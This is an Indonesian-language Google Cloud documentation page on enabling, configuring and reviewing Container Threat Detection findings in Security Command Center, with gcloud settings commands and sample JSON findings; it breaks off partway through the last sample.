Halaman ini menunjukkan cara meninjau temuan Container Threat Detection di konsol Google Cloud dan menyertakan contoh temuan Deteksi Ancaman Container. Container Threat Detection adalah layanan bawaan untuk tingkat Security Command Center Premium.
Untuk melihat temuan Container Threat Detection, layanan harus diaktifkan di setelan Layanan Security Command Center.
Pelajari lebih lanjut cara melihat dan mengelola temuan Container Threat Detection dalam artikel Meninjau temuan di halaman ini.
Untuk mengaktifkan Deteksi Ancaman Container dan detektor tingkat Premium lainnya di level project, lihat Mengaktifkan Security Command Center untuk project.
Menggunakan versi GKE yang didukung
Untuk mendeteksi potensi ancaman terhadap container Anda, pastikan cluster Anda berada di versi Google Kubernetes Engine (GKE) yang didukung. Container Threat Detection saat ini mendukung versi GKE berikut di saluran Stabil, Reguler, dan Cepat:
- GKE Standard >= 1.15.9-gke.12
- GKE Standard >= 1.16.5-gke.2
- GKE Standar >= 1,17
- GKE Standard >= 1.18.10-gke.1400
- GKE Standard >= 1.19.2-gke.2000
- GKE Standar >= 1,20
- GKE Standar >= 1,21
- Autopilot GKE >= 1.21.11-gke.900
- GKE Standard dan Autopilot >= 1,22
- GKE Standard dan Autopilot >= 1,23
Container Threat Detection hanya mendukung image node Container-Optimized OS.
Mengaktifkan Deteksi Ancaman Container
Saat Anda mengaktifkan Security Command Center Premium, Container Threat Detection akan diaktifkan secara default, kecuali jika Anda memilih untuk menonaktifkannya selama proses aktivasi.
Jika perlu mengaktifkan atau menonaktifkan Container Threat Detection untuk organisasi atau project, Anda dapat melakukannya di halaman Setelan Security Command Center. Untuk informasi selengkapnya, lihat Mengaktifkan atau menonaktifkan layanan bawaan.
Saat mengaktifkan Deteksi Ancaman Container, baik dengan mengaktifkan Security Command Center atau yang lebih baru, lakukan hal berikut:
- Untuk cluster apa pun yang tidak menggunakan versi GKE yang didukung, selesaikan langkah-langkah dalam panduan untuk mengupgrade cluster.
- Pastikan cluster Anda menyediakan resource yang memadai untuk menjalankan Container Threat Detection DaemonSet.
- Di Google Cloud Console, tinjau setelan pengaktifan layanan Deteksi Ancaman Container untuk memastikan Deteksi Ancaman Container diaktifkan untuk cluster Anda.
Izin IAM yang diperlukan
Container Threat Detection memerlukan izin untuk mengaktifkan dan menonaktifkan sendiri serta mengelola agen Container Threat Detection di cluster GKE.
Untuk memberikan izin yang diperlukan, peran IAM
Agen Layanan Deteksi Ancaman Container
(roles/containerthreatdetection.serviceAgent) harus diberikan
ke agen layanan Container Threat Detection, yang merupakan jenis akun layanan.
Menghapus peran default ini dari agen layanan dapat menghentikan Container Threat Detection agar tidak berfungsi dengan benar.
Bergantung pada cara dan waktu Security Command Center diaktifkan, nama agen layanan yang digunakan Container Threat Detection dapat berbeda:
Jika Security Command Center diaktifkan sebelum 7 Desember 2023, Container Threat Detection akan menggunakan agen layanan yang dikelola pengguna berikut:
service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.comJika Security Command Center diaktifkan di tingkat organisasi setelah 7 Desember 2023, Container Threat Detection akan menggunakan agen layanan tingkat organisasi yang dikelola pengguna berikut:
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.comJika Security Command Center diaktifkan di level project setelah 7 Desember 2023, Container Threat Detection akan menggunakan agen layanan tingkat organisasi yang dikelola pengguna berikut:
service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
Untuk mengetahui informasi selengkapnya tentang agen layanan dan peran IAM, lihat informasi berikut:
Memeriksa konfigurasi cluster GKE
Agar Container Threat Detection dapat berfungsi, jika cluster Anda berada di Virtual Private Cloud (VPC), jaringannya harus memenuhi persyaratan perutean, firewall, dan DNS agar dapat berkomunikasi dengan layanan dan API Google. Untuk mengakses Google API, tinjau panduan berikut:
- Jika cluster Anda adalah cluster pribadi, lihat Mengonfigurasi Akses Google Pribadi atau Mengonfigurasi Private Service Connect.
- Jika cluster Anda berada dalam perimeter layanan Kontrol Layanan VPC, pastikan bahwa
containerthreatdetection.googleapis.com, Container Threat Detection API, tercantum sebagai layanan yang dapat diakses. Untuk mengetahui informasi selengkapnya, lihat Ringkasan perimeter layanan. - Jika cluster Anda bukan cluster pribadi, baca artikel Mengakses API dari VM dengan alamat IP eksternal.
Selain itu, konfigurasi cluster GKE atau batasan kebijakan organisasi tidak boleh memblokir pembuatan atau penggunaan objek yang diperlukan Container Threat Detection untuk berfungsi. Bagian berikut mencakup daftar objek GKE yang dibuat oleh Container Threat Detection dan menjelaskan cara mengonfigurasi komponen GKE penting agar berfungsi dengan Deteksi Ancaman Container.
Objek Kubernetes
Setelah orientasi, Container Threat Detection membuat beberapa objek GKE di cluster yang diaktifkan. Objek ini digunakan untuk memantau image container, mengelola container dan pod dengan hak istimewa, serta mengevaluasi status untuk menghasilkan temuan. Tabel berikut berisi daftar objek, propertinya, dan fungsi pentingnya.
| Objek | Nama1 | Properti | Fungsi |
|---|---|---|---|
| ClusterRole | container-watcher-pod-reader |
Memberikan izin get, watch, dan list pada pod |
|
| ClusterRole | pod-reader |
Memberikan izin get, watch, dan list pada pod |
|
| ClusterRoleBinding | container-watcher-pod-reader
|
Memberikan peran container-watcher-pod-reader dan gce:podsecuritypolicy:privileged ke container-watcher-pod-reader ServiceAccount
|
|
| CustomResourceDefinition | containerwatcherstatuses.containerthreatdetection.googleapis.com |
Pelaporan status DaemonSet | |
| DaemonSet | container-watcher2 |
Diberi Hak Istimewa | Interaksi dengan Modul Keamanan Linux dan container engine |
| Pasang /host/ sebagai baca dan tulis | Komunikasi dengan Modul Keamanan Linux | ||
Memasang /etc/container-watcher/secrets sebagai hanya baca untuk mengakses container-watcher-token |
Authentication | ||
Menggunakan hostNetwork |
Pembuatan temuan | ||
| Gambar gke.gcr.io/watcher-daemonset |
Pengaktifan dan upgrade | ||
| Backend containerthreatdetection-REGION.googleapis.com:443 |
Pembuatan temuan | ||
| Peran | container-watcher-status-reporter |
Peran dengan get, list, watch, create, update, patch kata kerja untuk CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com |
Memungkinkan pembaruan informasi status DaemonSet |
| RoleBinding | gce:podsecuritypolicy:container-watcher |
Memberikan gce:podsecuritypolicy:privileged peran ke container-watcher-pod-reader ServiceAccount |
Mempertahankan fungsi saat PodSecurityPolicy diaktifkan |
container-watcher-status-reporter |
Memberikan container-watcher-status-reporter peran ke container-watcher-pod-reader ServiceAccount |
||
| Rahasia | container-watcher-token |
Authentication | |
| ServiceAccount | container-watcher-pod-reader |
Pengaktifan, upgrade, dan penonaktifan |
1 Semua objek berada dalam namespace kube-system, kecuali
container-watcher-pod-reader dan gce:podsecuritypolicy:container-watcher.
2 Selama penginstalan, update, atau penghapusan Container Threat Detection, Kubernetes mungkin mengeluarkan pesan error untuk objek Kubernetes atau dependensi lainnya yang hilang atau tidak lengkap untuk sementara waktu. Error ini akan otomatis teratasi saat Container Threat Detection menyelesaikan tindakan. Kecuali kesalahan berlanjut lebih dari beberapa menit, Anda dapat mengabaikannya.
PodSecurityPolicy dan Pengontrol Penerimaan
PodSecurityPolicy adalah resource pengontrol penerimaan yang Anda siapkan yang memvalidasi permintaan untuk membuat dan mengupdate pod di cluster Anda. Container Threat Detection kompatibel dengan
PodSecurityPolicies yang otomatis diterapkan saat membuat atau mengupdate
cluster dengan tanda enable-pod-security-policy. Secara khusus, Container Threat Detection menggunakan kebijakan gce.privileged saat PodSecurityPolicy diaktifkan.
Jika Anda menggunakan PodSecurityPolicies kustom atau pengontrol akses lainnya, PodSecurityPolicies tidak boleh memblokir pembuatan atau penggunaan objek Deteksi Ancaman Container agar dapat berfungsi. Misalnya, pengontrol penerimaan berbasis webhook yang menolak atau mengganti deployment dengan hak istimewa dapat menyebabkan Container Threat Detection tidak berfungsi dengan benar.
Untuk informasi selengkapnya, lihat Menggunakan PodSecurityPolicies.
Mengecualikan variabel lingkungan dari temuan Container Threat Detection
Secara default, saat Container Threat Detection menghasilkan temuan, Container Threat Detection akan melaporkan variabel lingkungan untuk semua proses yang dirujuk dalam temuan tersebut. Nilai variabel lingkungan bisa menjadi
penting saat menyelidiki serangan. Namun, beberapa paket software menyimpan rahasia dan informasi sensitif lainnya dalam variabel lingkungan. Agar Container Threat Detection tidak menyertakan variabel lingkungan proses dalam temuan Deteksi Ancaman Container, nonaktifkan modul REPORT_ENVIRONMENT_VARIABLES menggunakan Google Cloud CLI atau Security Command Center API ContainerThreatDetectionSettings di tingkat organisasi, folder, atau project.
Misalnya, untuk menonaktifkan pelaporan variabel lingkungan dalam sebuah project, jalankan perintah berikut:
gcloud alpha scc settings services modules disable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_ENVIRONMENT_VARIABLES \
--project=PROJECT_ID
Untuk memulihkan perilaku default, aktifkan pelaporan variabel lingkungan dengan menjalankan:
gcloud alpha scc settings services modules enable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_ENVIRONMENT_VARIABLES \
--project=PROJECT_ID
Untuk melihat semua perintah gcloud alpha scc untuk modul, lihat gcloud alpha
scc settings services
modules.
Mengecualikan argumen CLI dari temuan Container Threat Detection
Semua proses memiliki satu atau beberapa argumen command line (CLI). Secara default, jika Container Threat Detection menyertakan detail proses dalam temuan, Container Threat Detection akan merekam argumen CLI proses tersebut. Nilai argumen CLI bisa menjadi penting
saat menyelidiki serangan. Namun, beberapa pengguna dapat meneruskan rahasia dan informasi sensitif lainnya dalam argumen CLI. Agar Container Threat Detection tidak menyertakan argumen CLI proses dalam temuan Deteksi Ancaman Container, nonaktifkan modul REPORT_CLI_ARGUMENTS menggunakan Google Cloud CLI atau Security Command Center API ContainerThreatDetectionSettings di level project, folder, atau organisasi.
Misalnya, untuk menonaktifkan pelaporan argumen CLI dalam sebuah project, jalankan perintah berikut:
gcloud alpha scc settings services modules disable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_CLI_ARGUMENTS \
--project=PROJECT_ID
Untuk memulihkan perilaku default, aktifkan pelaporan argumen CLI dengan menjalankan:
gcloud alpha scc settings services modules enable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_CLI_ARGUMENTS \
--project=PROJECT_ID
Untuk melihat semua perintah gcloud alpha scc untuk modul, lihat gcloud alpha
scc settings services
modules.
Penggunaan resource
Container Threat Detection dirancang untuk memiliki dampak performa yang dapat diabaikan pada cluster Anda, dan seharusnya tidak memiliki dampak latensi pada operasi cluster apa pun.
Penggunaan resource bergantung pada beban kerja. Namun, komponen inti Container Threat Detection —userspace DaemonSet dan Linux Security Module (LSM)—memiliki estimasi dampak performa berikut:
- DaemonSet: Maksimum 0,125 vCPU dan memori 300 MB, berdasarkan batas keras yang ditetapkan untuk membatasi penggunaan resource. Batas terkadang dievaluasi ulang dan dapat diubah untuk mengoptimalkan performa, terutama untuk node yang sangat besar.
- LSM: Bervariasi berdasarkan karakteristik beban kerja, tetapi jika menekan LSM, kami mengamati kurang dari 2% CPU dan 1% memori. Anda dapat menguji dampak performa dengan menginstrumentasikan workload dengan dan tanpa mengaktifkan Container Threat Detection.
Jika Anda adalah pelanggan BigQuery, Anda dapat mengaktifkan pengukuran penggunaan GKE untuk memantau penggunaan resource pada DaemonSet userspace Container Threat Detection. Untuk melihat
DaemonSet userspace dalam pengukuran penggunaan, telusuri kube-system namespace
dan label k8s-app=container-watcher.
Pengukuran penggunaan GKE tidak dapat melacak penggunaan CPU kernel secara khusus untuk LSM. Data itu termasuk dalam penggunaan CPU secara keseluruhan.
Container Threat Detection API
Container Threat Detection secara otomatis mengaktifkan containerthreatdetection API selama orientasi untuk memungkinkan pembuatan temuan. Anda tidak boleh berinteraksi langsung dengan API yang diperlukan ini. Menonaktifkan API ini akan merusak kemampuan Deteksi Ancaman Container untuk membuat temuan baru. Jika Anda ingin berhenti menerima temuan Container Threat Detection, nonaktifkan Container Threat Detection di setelan Services Security Command Center.
Meninjau temuan
Saat Container Threat Detection menghasilkan temuan, Anda dapat melihatnya di Security Command Center. Jika mengonfigurasi Ekspor Berkelanjutan untuk menulis log, Anda juga dapat melihat temuan di Cloud Logging. Untuk membuat temuan dan memverifikasi konfigurasi, Anda dapat dengan sengaja memicu detektor dan menguji Container Threat Detection.
Container Threat Detection memiliki latensi berikut:
- Latensi aktivasi 3,5 jam untuk organisasi atau project yang baru bergabung.
- Latensi aktivasi dalam hitungan menit untuk cluster yang baru dibuat.
- Latensi deteksi dalam hitungan menit untuk ancaman pada cluster yang telah diaktifkan.
Meninjau temuan di konsol Google Cloud
Peran IAM untuk Security Command Center dapat diberikan di tingkat organisasi, folder, atau project. Kemampuan Anda untuk melihat, mengedit, membuat, atau memperbarui temuan, aset, dan sumber keamanan bergantung pada tingkat akses yang diberikan kepada Anda. Untuk mempelajari peran Security Command Center lebih lanjut, lihat Kontrol akses.
Untuk meninjau temuan Container Threat Detection di Security Command Center, ikuti langkah-langkah berikut:
Buka halaman Findings Security Command Center di Konsol Google Cloud.
Jika perlu, pilih organisasi atau project Google Cloud Anda.
Di bagian Quick filters, pada subbagian Source display name, pilih Container Threat Detection.
Untuk melihat detail temuan tertentu, klik nama temuan di bagian
Category. Panel detail temuan diperluas untuk menampilkan informasi tentang temuan, yang disusun ke dalam beberapa atau semua bagian berikut:- Yang terdeteksi: Informasi tentang masalah keamanan yang terdeteksi, termasuk ringkasan yang dibuat AIPratinjau masalah tersebut.
- Resource yang terpengaruh: Informasi tentang resource tempat masalah terdeteksi.
- Tanda keamanan: Tanda keamanan apa pun yang mungkin ditambahkan oleh tim Anda ke temuan.
- Langkah berikutnya: Langkah apa pun yang dapat Anda lakukan untuk menyelesaikan masalah tersebut.
- Link terkait: Link ke standar yang relevan, temuan terkait, alat investigasi tambahan, dan sebagainya.
- Layanan pendeteksian: Informasi tentang layanan Security Command Center, seperti Deteksi Ancaman Container, yang mendeteksi masalah, serta informasi tentang temuan itu sendiri.
Untuk melihat struktur JSON lengkap dari temuan, klik tab JSON.
Untuk mengetahui daftar temuan Container Threat Detection, lihat Pendeteksi Ancaman Container.
Melihat temuan di Cloud Logging
Untuk melihat temuan Container Threat Detection di Cloud Logging, lakukan langkah berikut:
Buka halaman Logs Explorer untuk Cloud Logging di Konsol Google Cloud.
Di Pemilih project di bagian atas halaman, pilih project tempat Anda menyimpan log Deteksi Ancaman Container.
Klik tab Builder kueri.
Di menu drop-down Resource, pilih Threat Detector.
- Untuk melihat temuan dari semua pendeteksi, pilih all detektor_name.
- Untuk melihat temuan dari detektor tertentu, pilih namanya.
Atau, masukkan
resource.type="threat_detector"di kotak teks pembuat kueri, lalu klik Run Query.Tabel diperbarui dengan log yang Anda pilih.
Buat kueri log lanjutan untuk menentukan kumpulan entri log dari sejumlah log.
Contoh format temuan
Bagian ini mencakup format JSON dari temuan Deteksi Ancaman Container.
Contoh-contoh ini berisi {i>field<i} yang paling umum untuk semua temuan. Namun, semua kolom mungkin tidak muncul di setiap temuan. Output aktual yang Anda lihat bergantung pada konfigurasi resource serta jenis dan status temuan. Informasi dari Kubernetes dan containerd diberikan melalui upaya terbaik dan tidak dijamin.
Untuk informasi selengkapnya tentang kolom dalam setiap temuan, lihat deskripsi kolom di Resource REST: organizations.sources.findings.
Biner Dijalankan Ditambahkan
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Added Binary Executed",
"sourceProperties": {
"VM_Instance_Name": "INSTANCE_ID",
"Added_Binary_Kind": "Added",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Name": "CONTAINER_NAME",
"Parent_Pid": 1.0,
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Creation_Timestamp": {
"seconds": 1.617989997E9,
"nanos": 1.17396995E8
},
"Pid": 53.0,
"Pod_Namespace": "default",
"Process_Binary_Fullpath": "BINARY_PATH",
"Process_Arguments": ["BINARY_PATH"],
"Pod_Name": "POD_NAME",
"description": "A binary that was not part of the original container image
was executed. If an added binary is executed by an attacker, this is a
possible sign that an attacker has control of the workload and they are
executing arbitrary commands.",
"Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
test-4af235e12be6f9d9", "HOME\u003d/root",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
"Container_Creation_Timestamp": {
"seconds": 1.617989918E9,
"nanos": 0.0
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:39:57.527Z",
"createTime": "2021-04-09T17:39:57.625Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Added_Binary_Kind": {
"primitiveDataType": "STRING"
},
"description": {
"primitiveDataType": "STRING"
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Koleksi Ditambahkan Telah Dimuat
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Added Library Loaded",
"sourceProperties": {
"Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
"Parent_Pid": 1.0,
"Container_Name": "CONTAINER_NAME",
"Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Creation_Timestamp": {
"seconds": 1.618004144E9,
"nanos": 0.0
},
"Pod_Name": "POD_NAME",
"Pid": 7.0,
"description": "A library that was not part of the original container
image was loaded. If an added library is loaded, this is a possible sign
that an attacker has control of the workload and they are executing
arbitrary code.",
"VM_Instance_Name": "INSTANCE_ID",
"Pod_Namespace": "default",
"Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
"KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
"HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
, "KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
"Process_Binary_Fullpath": "BINARY_PATH",
"Added_Library_Kind": "Added",
"Container_Image_Uri": "CONTAINER_IMAGE_uri"
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T21:36:13.069Z",
"createTime": "2021-04-09T21:36:13.267Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Added_Library_Fullpath": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"description": {
"primitiveDataType": "STRING"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Added_Library_Kind": {
"primitiveDataType": "STRING"
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Eksekusi: Menambahkan Biner Berbahaya yang Dijalankan
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Added Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T19:51:22.538Z",
"database": {},
"eventTime": "2023-11-13T19:51:22.383Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.68.2.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-added-test-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.68.2.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.68.2.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.68.2.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "added_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699905066",
"nanos": 618571329
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Eksekusi: Menambahkan Library Berbahaya Dimuat
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Added Malicious Library Loaded",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:40:14.340Z",
"database": {},
"eventTime": "2023-11-13T21:40:14.209Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/drop_mal_lib\"",
"size": "5005064",
